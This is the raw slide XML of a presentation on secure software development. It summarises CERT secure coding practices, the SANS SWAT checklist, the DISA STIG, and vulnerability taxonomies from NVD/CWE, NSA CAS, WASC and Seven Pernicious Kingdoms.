                        <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike" u="sng">
                          <a:solidFill>
                            <a:srgbClr val="002060"/>
                          </a:solidFill>
                          <a:uFillTx/>
                          <a:latin typeface="Calibri"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>C++ MSC00-A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>]. Use static and dynamic analysis tools to detect and eliminate additional security flaw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4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 Architect and design for security policies.</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eate a software architecture and design your software to implement and enforce security policies. For example, if your system requires different privileges at different times, consider dividing the system into distinct intercommunicating subsystems, each with an appropriate privilege se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4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 Keep it simple.</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eep the design as simple and small as possible [Saltzer 74, Saltzer 75]. Complex designs increase the likelihood that errors will be made in their implementation, configuration, and use. Additionally, the effort required to achieve an appropriate level of assurance increases dramatically as security mechanisms become more complex.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 Default deny.</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se access decisions on permission rather than exclusion. This means that, by default, access is denied and the protection scheme identifies conditions under which access is permitted [Saltzer 74, Saltzer 75].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2A8C-A913-452F-928A-631BC93544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10 Secure Coding Practices (CERT/SEI) (2)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2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1FF7-AFA9-4FCB-ABA0-DE5456FA54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54" name=""/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="152280" y="1523880"/>
          <a:ext cx="8839440" cy="5126040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1981440"/>
                <a:gridCol w="68580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act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 Adhere to the principle of least privilege.</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process should execute with the the least set of privileges necessary to complete the job. Any elevated permission should be held for a minimum time. This approach reduces the opportunities an attacker has to execute arbitrary code with elevated privileges [Saltzer 74, Saltzer 75].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7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 Sanitize data sent to other systems.</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itize all data passed to complex subsystems [</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike" u="sng">
                          <a:solidFill>
                            <a:srgbClr val="002060"/>
                          </a:solidFill>
                          <a:uFillTx/>
                          <a:latin typeface="Calibri"/>
                          <a:hlinkClick r:id="rId1"/>
                        </a:rPr>
                        <a:t>C STR02-A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>] such as command shells, relational databases, and commercial off-the-shelf (COTS) components. Attackers may be able to invoke unused functionality in these components through the use of SQL, command, or other injection attacks. This is not necessarily an input validation problem because the complex subsystem being invoked does not understand the context in which the call is made. Because the calling process understands the context, it is responsible for sanitizing the data before invoking the subsystem.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06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 Practice</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>defense in depth.</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risk with multiple defensive strategies, so that if one layer of defense turns out to be inadequate, another layer of defense can prevent a security flaw from becoming an exploitable vulnerability and/or limit the consequences of a successful exploit. For example, combining secure programming techniques with secure runtime environments should reduce the likelihood that vulnerabilities remaining in the code at deployment time can be exploited in the operational environment [Seacord 0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9. Use effective quality assurance techniques.</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quality assurance techniques can be effective in identifying and eliminating vulnerabilities. Fuzz testing, penetration testing, and source code audits should all be incorporated as part of an effective quality assurance program. Independent security reviews can lead to more secure systems. External reviewers bring an independent perspective; for example, in identifying and correcting invalid assumptions [Seacord 0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 Adopt a secure coding standard.</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nd/or apply a secure coding standard for your target development language and platfor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S Securing Web Application Technologies (SWAT) Checklist (1)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256"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ror handling &amp; logging</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splay generic error messag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unhandled exception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ress framework generated error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g all authentication activiti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g all privilege chang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g administrative activiti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g access to sensitive data</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 not log inappropriate data</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ore logs securely</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257"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protection</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SSL everywher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sable HTTP access for all SSL enabled resourc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the strict- Transport-security header</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ore user passwords using a strong, iterative, salted has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urely exchange encryption key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sable weak SSL ciphers on server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valid SSL certificates from a reputable CA</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sable data caching using cache control headers and autocomplet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mit the use and storage of sensitive data</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="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CD87-632C-4FE2-BC32-F11D45237B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9" name="TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2766600" y="6095880"/>
            <a:ext cx="598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s://software-security.sans.org/resources/sw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S Securing Web Application Technologies (SWAT) Checklist (2)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261"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figuration and operations</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stablish a rigorous change management proces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fine security requirement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duct a design review</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form code review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form security test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arden the infrastructur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fine an incident handling plan</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e the team on security</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262"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entication</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n't hardcode credential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 a strong password reset system</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 a strong password policy</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 account lockout against brute force attack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n't disclose too much information in error messag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ore database credentials securely</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plications and Middleware should run with minimal privileges</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2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4303B-B51E-4C16-B9AA-BD23789B41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S Securing Web Application Technologies (SWAT) Checklist (3)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265"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ssion management</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sure that session identifiers are sufficiently random</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generate session token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 an idle session timeou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 an absolute session timeou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stroy sessions at any sign of tamper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validate the session after logou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ce a logout button on every pag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secure cookie attributes (i.e. httponly and secure flag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 the cookie domain and path correctly</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 the cookie expiration time</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266"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put &amp; output handling</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duct contextual output encod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fer whitelists over blacklist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parameterized SQL queri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tokens to prevent forged request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 the encoding for your application</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lidate uploaded fil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the nosniff header for uploaded conten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lidate the source of inpu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the X-frame- options header</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content security Policy (csP) or X-Xss- Protection headers</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2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820E1-656F-4CC7-A5C3-0F564E7425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S Securing Web Application Technologies (SWAT) Checklist (4)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26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 control</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 access controls checks consistentl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 the principle of least privileg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use direct object references for access control check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use unvalidated forwards or redirects</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="270" name="" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648320" y="1600200"/>
            <a:ext cx="4038480" cy="4525920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2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E839-A842-40D5-9CAE-A735D65838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the character encoding of output</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let browser/user guess the character encoding – tell them (and make sure it’s righ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browser has to guess, attacker may fool system into sending material that leads to wrong gues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include in HTML &lt;head&g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t;meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"&g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 “charset” (HTTP/1.1 is practically universally implemented, so okay to use now)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="32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F853-F92B-4F91-8C0B-F2FCD7A279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 AppSec Dev STIG</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2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A “Application Security and Development STI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by Department of Defense (DO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ct language, e.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PP3540.1: CAT I) The Designer will ensure the application is not vulnerable to SQL inje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iase.disa.mil/stigs/a-z.html</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2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8F2C-83E2-418D-954C-05C5E6B58B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ST National Vulnerability Database (NVD): CWE subset</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2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C4DAF-6192-47A0-87AE-0325BF97F2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77" name=""/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228600" y="1397160"/>
          <a:ext cx="8763120" cy="5100480"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2209680"/>
                <a:gridCol w="1219320"/>
                <a:gridCol w="5334120"/>
              </a:tblGrid>
              <a:tr h="371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WE-I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escrip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hentication Issue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287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to properly authenticate user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79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entials Management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255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to properly create, store, transmit, or protect passwords and other credential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6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missions, Privileges, and Access Control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264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to enforce permissions or other access restrictions for resources, or a privilege management problem.</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66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ffer Error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119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ffer overflows and other buffer boundary errors in which a program attempts to put more data in a buffer than the buffer can hold, or when a program attempts to put data in a memory area outside of the boundaries of the buffe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54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oss-Site Request Forgery (CSRF)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352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to verify that the sender of a web request actually intended to do so. CSRF attacks can be launched by sending a formatted request to a victim, then tricking the victim into loading the request (often automatically), which makes it appear that the request came from the victim. CSRF is often associated with XSS, but it is a distinct issu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6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oss-Site Scripting (XS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79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of a site to validate, filter, or encode user input before returning it to another user’s web clien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ST National Vulnerability Database (NVD): CWE subset</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2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FC77-0E4C-4F20-B2FB-22B615496D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80" name=""/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228600" y="1397160"/>
          <a:ext cx="8763120" cy="5308560"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2209680"/>
                <a:gridCol w="1219320"/>
                <a:gridCol w="5334120"/>
              </a:tblGrid>
              <a:tr h="36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WE-I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escrip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yptographic Issue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310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insecure algorithm or the inappropriate use of one; an incorrect implementation of an algorithm that reduces security; the lack of encryption (plaintext); also, weak key or certificate management, key disclosure, random number generator problem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h Traversal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22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user-supplied input can contain “..” or similar characters that are passed through to file access APIs, causing access to files outside of an intended subdirector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67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de Injection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94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using a system to read an attacker-controlled file and execute arbitrary code within that file. Includes PHP remote file inclusion, uploading of files with executable extensions, insertion of code into executable files, and other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mat String Vulnerability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134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use of attacker-controlled input as the format string parameter in certain function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figuration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16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general configuration problem that is not associated with passwords or permission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ation Leak / Disclosure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200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posure of system information, sensitive or private information, fingerprinting, etc.</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ST National Vulnerability Database (NVD): CWE subset</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2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DDDE-719E-4204-872C-EDA4DB39FB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83" name=""/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228600" y="1397160"/>
          <a:ext cx="8763120" cy="5064120"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2209680"/>
                <a:gridCol w="1219320"/>
                <a:gridCol w="5334120"/>
              </a:tblGrid>
              <a:tr h="369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WE-I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escrip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66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put Validation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20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to ensure that input contains well-formed, valid data that conforms to the application’s specifications. Note: this overlaps other categories like XSS, Numeric Errors, and SQL Injec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796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umeric Error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189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ger overflow, signedness, truncation, underflow, and other errors that can occur when handling number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4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S Command Injection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78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owing user-controlled input to be injected into command lines that are created to invoke other programs, using system() or similar function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85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ace Condition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362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state of a resource can change between the time the resource is checked to when it is accesse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3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ource Management Errors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399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software allows attackers to consume excess resources, such as memory exhaustion from memory leaks, CPU consumption from infinite loops, disk space consumption, etc.</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18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QL Injection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89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user input can be embedded into SQL statements without proper filtering or quoting, leading to modification of query logic or execution of SQL command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ST National Vulnerability Database (NVD): CWE subset</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2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6BDC0-6EB1-4340-81B2-7EE6CCE773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86" name=""/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228600" y="1397160"/>
          <a:ext cx="8763120" cy="3997080"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2209680"/>
                <a:gridCol w="1219320"/>
                <a:gridCol w="5334120"/>
              </a:tblGrid>
              <a:tr h="369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am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WE-I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escrip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4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nk Following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WE-59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lure to protect against the use of symbolic or hard links that can point to files that are not intended to be accessed by the applica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2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Mapping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VD is only using a subset of CWE for mapping instead of the entire CWE, and the weakness type is not covered by that subs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 in CWE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Mapping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weakness type is not covered in the version of CWE that was used for mapping.</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6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sufficient Information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Mapping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is insufficient information about the issue to classify it; details are unknown or unspecifie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2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sign Error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Mapping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vulnerability is characterized as a “Design error” if there exists no errors in the implementation or configuration of a system, but the initial design causes a vulnerability to exis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287" name="TextBox 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4486320" y="6248520"/>
            <a:ext cx="37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nvd.nist.gov/cwe.cf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Software Flaw Taxonomy: Aiming Tools At Security”</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="289" name="Content Placeholder 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1600200"/>
            <a:ext cx="3851280" cy="4973760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2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822F-D96F-468E-9C7F-C216D5296F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1" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5009760" y="4952880"/>
            <a:ext cx="389952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Software Flaw Taxonomy: Aiming Tools At Secur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m Weber Paul A. Karger Amit Paradk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we.mitre.org/documents/sourc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oftwareFlawTaxonomy-AimingToolsatSecur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Weber,Karger,Paradkar%5D.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akness Classes</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>(NSA Center for Assured Software)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="293" name=""/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609480" y="1514520"/>
          <a:ext cx="7696440" cy="5191200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3052800"/>
                <a:gridCol w="464364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eakness cl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 CW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hentication and Access Control</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620: Unverified Password Chang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ffer Handling [not in Java]</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121: Stack-based Buffer Overflow</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de Qualit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561: Dead Code, CWE-676 Use of potentially dangerous functio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trol Flow Managemen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833: Deadlock</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cryption and Randomnes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328: Reversible One-Way Hash</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rror Handling</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252: Unchecked Return Valu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le Handling</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23: Relative Path Traversal</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ation Leak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534: Information Exposure Through Debug Log File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itialization and Shutdow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415: Double Fre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jec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134: Uncontrolled Format String</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licious Logic</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506: Embedded Malicious Cod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umber Handling</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369: Divide by Zero</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inter and Reference Handling</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E-476: NULL Pointer Dereferenc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2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D8E2-152D-4AE7-A8FF-C7ECCC4B64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5" name="TextBox 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7167960" y="5105520"/>
            <a:ext cx="1678680" cy="824040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="eeece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amate.nist.g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s/CAS_2011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_Tool_Method.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C Threat Classification v2.0</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name=""/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1599840"/>
            <a:ext cx="8229600" cy="480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ack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use of Functionality,  Brute Force,     Buffer Overflow,     Content Spoofing,     Credential/Session Prediction,     Cross-Site Scripting,     Cross-Site Request Forgery,     Denial of Service,     Fingerprinting, Format String,     HTTP Response Smuggling,     HTTP Response Splitting,     HTTP Request Smuggling,     HTTP Request Splitting,     Integer Overflows,     LDAP Injection,     Mail Command Injection,     Null Byte Injection,     OS Commanding,     Path Traversal,     Predictable Resource Location,     Remote File Inclusion (RFI),     Routing Detour,     Session Fixation,     SOAP Array Abuse,     SSI Injection,     SQL Injection,     URL Redirector Abuse,     XPath Injection,  XML Attribute Blowup,     XML External Entities,     XML Entity Expansion,     XML Injection,     XQuery Injection</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akness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tion Misconfiguration, Directory Indexing,     Improper Filesystem Permissions,     Improper Input Handling,     Improper Output Handling,     Information Leakage,     Insecure Indexing,     Insufficient Anti-automation,     Insufficient Authentication,     Insufficient Authorization,     Insufficient Password Recovery,     Insufficient Process Validation,     Insufficient Session Expiration,     Insufficient Transport Layer Protection,     Server Misconfigur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2E41-ED2E-41DF-9A9E-372C710DCA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9" name="TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686160" y="6335640"/>
            <a:ext cx="750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http://projects.webappsec.org/w/page/13246978/Threat%20Classifi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 Pernicious Kingdoms</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put Validation and Represen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I Ab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urity Fea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e and St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Hand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de Qu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capsulation</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3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8326-C9A7-4417-B179-34C4F6F695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TextBox 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3272760" y="6019920"/>
            <a:ext cx="50486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sipenyuk, Chess, and McGra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ven Pernicious Kingdoms: A Taxonomy of Software Security Erro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ceedings SSATTM, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>200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ftware SOAR 2014</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>(Wheeler &amp; Moorthy)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3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6550-0A39-49B5-BF3E-F874B39E89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6" name="Content Placeholder 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704880" y="1523880"/>
            <a:ext cx="4400640" cy="5181840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>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vide design and code* quality</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er known vulnerabilities (CVEs) </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>(incl. of obsolete subcomponents)</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sure authentication and access control*</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="741240" indent="-34128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thentication Issues</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="741240" indent="-34128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edentials Management</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="741240" indent="-34128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missions, Privileges, and Access Control</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="741240" indent="-34128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ast Privilege</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er unintentional-“like” weaknesses</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er intentional-“like”/malicious logic*</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="741240" indent="-34128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nown malware</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="741240" indent="-34128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 known malware</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vide anti-tamper (confidentiality of algorithms for CPI) and ensure transparency</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er development tool inserted weaknesses</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vide secure delivery</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vide secure configuration</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e.g., power)</a:t>
            </a:r>
